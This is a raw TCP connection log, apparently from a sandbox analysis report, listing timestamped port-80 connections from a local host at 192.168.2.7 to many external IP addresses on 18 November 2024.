                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:56.374641895 CET805012044.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:56.374821901 CET5012080192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:56.380040884 CET805012044.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:56.380126953 CET5012080192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:56.388598919 CET5012180192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:56.393476009 CET805012154.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:56.393587112 CET5012180192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:56.393744946 CET5012180192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:56.393779039 CET5012180192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:56.398586988 CET805012154.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:56.398600101 CET805012154.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:56.921463966 CET5012280192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:56.926814079 CET805012254.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:56.927838087 CET5012280192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:56.928046942 CET5012280192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:56.928071976 CET5012280192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:56.933459997 CET805012254.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:56.933480978 CET805012254.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:57.233956099 CET805012154.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:57.236166000 CET5012180192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:57.241545916 CET805012154.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:57.241636992 CET5012180192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:57.252545118 CET5012380192.168.2.73.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:57.257505894 CET80501233.254.94.185192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:57.257651091 CET5012380192.168.2.73.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:57.257750988 CET5012380192.168.2.73.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:57.257771969 CET5012380192.168.2.73.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:57.262681961 CET80501233.254.94.185192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:57.262695074 CET80501233.254.94.185192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:57.757605076 CET805012254.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:57.757786036 CET5012280192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:57.763041973 CET805012254.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:57.763154030 CET5012280192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:58.196310997 CET5012480192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:58.201340914 CET805012418.246.231.120192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:58.201440096 CET5012480192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:58.201603889 CET5012480192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:58.201630116 CET5012480192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:58.206398010 CET805012418.246.231.120192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:58.206410885 CET805012418.246.231.120192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:58.229454994 CET80501233.254.94.185192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:58.229623079 CET5012380192.168.2.73.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:58.236324072 CET80501233.254.94.185192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:58.236382008 CET5012380192.168.2.73.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:58.242330074 CET5012580192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:58.247251987 CET805012518.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:58.247342110 CET5012580192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:58.247466087 CET5012580192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:58.247487068 CET5012580192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:58.253119946 CET805012518.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:58.253134966 CET805012518.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:59.032234907 CET805012418.246.231.120192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:59.037781954 CET5012480192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:59.043100119 CET805012418.246.231.120192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:59.045622110 CET5012480192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:59.052284956 CET5012680192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:59.057214975 CET805012618.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:59.061618090 CET5012680192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:59.061762094 CET5012680192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:59.061805964 CET5012680192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:59.066580057 CET805012618.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:59.066670895 CET805012618.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:59.713448048 CET805012518.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:59.713609934 CET5012580192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:59.719216108 CET805012518.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:59.719274998 CET5012580192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:59.725085974 CET5012680192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:59.727427006 CET5012780192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:59.728101015 CET5012880192.168.2.734.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:59.728986979 CET805012618.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:59.729038000 CET5012680192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:59.732342958 CET805012718.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:59.732398987 CET5012780192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:59.732599020 CET5012780192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:59.732609987 CET5012780192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:59.732892036 CET805012834.246.200.160192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:59.732963085 CET5012880192.168.2.734.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:59.733084917 CET5012880192.168.2.734.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:59.733094931 CET5012880192.168.2.734.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:59.737422943 CET805012718.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:59.737462997 CET805012718.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:59.737809896 CET805012834.246.200.160192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:59.737847090 CET805012834.246.200.160192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:00.387079954 CET805012718.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:00.387295008 CET5012780192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:00.392616034 CET805012718.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:00.392683029 CET5012780192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:00.404128075 CET5012980192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:00.409171104 CET805012944.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:00.409249067 CET5012980192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:00.409373045 CET5012980192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:00.409388065 CET5012980192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:00.414180040 CET805012944.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:00.414520025 CET805012944.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:00.698491096 CET805012834.246.200.160192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:00.698647976 CET5012880192.168.2.734.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:00.704009056 CET805012834.246.200.160192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:00.704063892 CET5012880192.168.2.734.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:00.896554947 CET5013080192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:00.901735067 CET805013047.129.31.212192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:00.904021978 CET5013080192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:00.904134035 CET5013080192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:00.904226065 CET5013080192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:00.909168959 CET805013047.129.31.212192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:00.909181118 CET805013047.129.31.212192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:01.084276915 CET805012944.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:01.084476948 CET5012980192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:01.089751005 CET805012944.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:01.089802027 CET5012980192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:01.105540037 CET5013180192.168.2.772.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:01.110367060 CET805013172.52.178.23192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:01.110469103 CET5013180192.168.2.772.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:01.110637903 CET5013180192.168.2.772.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:01.110658884 CET5013180192.168.2.772.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:01.115466118 CET805013172.52.178.23192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:01.115489960 CET805013172.52.178.23192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:01.825846910 CET805013172.52.178.23192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:01.825932026 CET5013180192.168.2.772.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:01.825989008 CET5013180192.168.2.772.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:01.827224016 CET5013280192.168.2.772.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:01.830847979 CET805013172.52.178.23192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:01.832007885 CET805013272.52.178.23192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:01.832078934 CET5013280192.168.2.772.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:01.832252979 CET5013280192.168.2.772.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:01.832309961 CET5013280192.168.2.772.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:01.837059021 CET805013272.52.178.23192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:01.837116957 CET805013272.52.178.23192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:02.391774893 CET805013047.129.31.212192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:02.392008066 CET5013080192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:02.397628069 CET805013047.129.31.212192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:02.397696972 CET5013080192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:02.405191898 CET5013380192.168.2.73.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:02.409998894 CET80501333.94.10.34192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:02.410106897 CET5013380192.168.2.73.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:02.410276890 CET5013380192.168.2.73.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:02.410314083 CET5013380192.168.2.73.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:02.415116072 CET80501333.94.10.34192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:02.415146112 CET80501333.94.10.34192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:02.553647995 CET805013272.52.178.23192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:02.553719044 CET5013280192.168.2.772.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:02.553816080 CET5013280192.168.2.772.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:02.558962107 CET805013272.52.178.23192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:02.569561958 CET5013480192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:02.574763060 CET805013444.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:02.575165987 CET5013480192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:02.575328112 CET5013480192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:02.575339079 CET5013480192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:02.580389977 CET805013444.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:02.580442905 CET805013444.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:03.065237999 CET80501333.94.10.34192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:03.065733910 CET5013380192.168.2.73.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:03.071137905 CET80501333.94.10.34192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:03.073513031 CET5013380192.168.2.73.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:03.077461004 CET5013580192.168.2.735.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:03.082432032 CET805013535.164.78.200192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:03.082520008 CET5013580192.168.2.735.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:03.082626104 CET5013580192.168.2.735.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:03.084983110 CET5013580192.168.2.735.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:03.087459087 CET805013535.164.78.200192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:03.089992046 CET805013535.164.78.200192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:03.238588095 CET805013444.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:03.238786936 CET5013480192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:03.244041920 CET805013444.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:03.244132996 CET5013480192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:03.265294075 CET5013680192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:03.270334959 CET805013618.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:03.270442963 CET5013680192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:03.270679951 CET5013680192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:03.270797014 CET5013680192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:03.275509119 CET805013618.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:03.275607109 CET805013618.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:03.731307030 CET5013680192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:03.744246960 CET5013780192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:03.749236107 CET805013718.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:03.749479055 CET5013780192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:03.820791006 CET5013780192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:03.821135998 CET5013780192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:03.826164961 CET805013718.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:03.826595068 CET805013718.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:03.913894892 CET805013535.164.78.200192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:03.958156109 CET5013580192.168.2.735.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:04.035109997 CET805013535.164.78.200192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:04.035229921 CET5013580192.168.2.735.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:04.060760975 CET5013580192.168.2.735.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:04.065702915 CET805013535.164.78.200192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:04.127245903 CET5013880192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:04.132390022 CET805013818.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:04.132477045 CET5013880192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:04.132658005 CET5013880192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:04.132678032 CET5013880192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:04.137597084 CET805013818.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:04.137794971 CET805013818.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:05.201978922 CET805013718.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:05.202204943 CET5013780192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:05.207407951 CET805013718.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:05.207520962 CET5013780192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:05.225106001 CET5013980192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:05.229995966 CET805013918.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:05.230076075 CET5013980192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:05.230384111 CET5013980192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:05.230385065 CET5013980192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:05.235230923 CET805013918.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:05.235265017 CET805013918.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:05.591305971 CET805013818.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:05.592438936 CET5013880192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:05.598232985 CET805013818.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:05.599333048 CET5013880192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:05.604932070 CET5005680192.168.2.7208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:05.605026007 CET5005680192.168.2.7208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:05.609836102 CET8050056208.100.26.245192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:05.609894037 CET8050056208.100.26.245192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:05.902442932 CET805013918.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:05.902663946 CET5013980192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:05.908886909 CET805013918.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:05.909056902 CET5013980192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:05.918983936 CET5014080192.168.2.7172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:05.924330950 CET8050140172.234.222.143192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:05.924424887 CET5014080192.168.2.7172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:05.924559116 CET5014080192.168.2.7172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:05.924580097 CET5014080192.168.2.7172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:05.929569960 CET8050140172.234.222.143192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:05.929631948 CET8050140172.234.222.143192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:05.932612896 CET8050056208.100.26.245192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:05.933841944 CET5005680192.168.2.7208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:05.933867931 CET5005680192.168.2.7208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:05.938802004 CET8050056208.100.26.245192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:05.938832045 CET8050056208.100.26.245192.168.2.7
